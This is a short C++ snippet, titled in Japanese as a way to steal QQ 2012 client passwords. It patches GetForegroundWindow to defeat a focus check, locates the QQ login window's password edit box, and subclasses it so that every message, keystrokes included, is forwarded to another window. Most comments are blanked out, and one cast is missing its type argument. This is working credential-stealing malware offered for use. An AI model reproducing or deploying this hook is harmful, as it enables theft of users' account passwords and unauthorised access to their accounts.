QQ 2012クライアントのパスワードを盗む

/*
 *   GetForegroundWindow  ，  QQ              ，            ；             ，    
*/

BOOL CalePatchAddr()
{
	FARPROC FuncAddr = GetProcAddress(GetModuleHandle(_T("USER32.DLL")), "GetForegroundWindow");
	byte HookCode[] = {0xC3/*ret*/, 0x90/*nop*/, 0x90, 0x90, 0x90};

	LPVOID CodeAddr = VirtualAlloc(0, 5, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	memcpy(CodeAddr, HookCode, 5);

	ULONG oData;
	VirtualProtect(FuncAddr, 5, PAGE_EXECUTE_READWRITE, &oData);
	byte NewCode[] = { 0xE9 /*jmp*/, 0, 0, 0, 0 };
	DWORD off = (DWORD)CodeAddr - (DWORD)FuncAddr - 5;

	memcpy(&NewCode[1], &off, 4);
	memcpy(FuncAddr, NewCode, 5);

	return TRUE;
}

WNDPROC pswd_proc = NULL;
HWND recv_hwnd = NULL;

//      
LRESULT CALLBACK WndProc2(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam)
{
	SendMessage((HWND)recv_hwnd, message, wParam, lParam);

//     ，        。
	return ::CallWindowProc(pswd_proc, hWnd, message, wParam, lParam);
}
void InstallHook()
{
	HWND QQ_hwnd = ::FindWindow(_T("TXGuiFoundation"), _T("QQ2012"));
	if (QQ_hwnd == NULL)
	{
		AfxMessageBox(_T("QQ not found!"));
		return;
	}

	HWND pswd_hwnd = FindWindowEx(QQ_hwnd, 0, _T("Edit"), 0);	//: MsgBox hwnd_qq_psw
	if (pswd_hwnd == NULL)
	{
		AfxMessageBox(_T("pswd HWND not found!"));
		return;
	}
	//          ，    
	pswd_proc = reinterpret_cast(GetWindowLong(pswd_hwnd, GWL_WNDPROC));


	long ret = SetWindowLong(pswd_hwnd, GWL_WNDPROC, (long)WndProc2);
}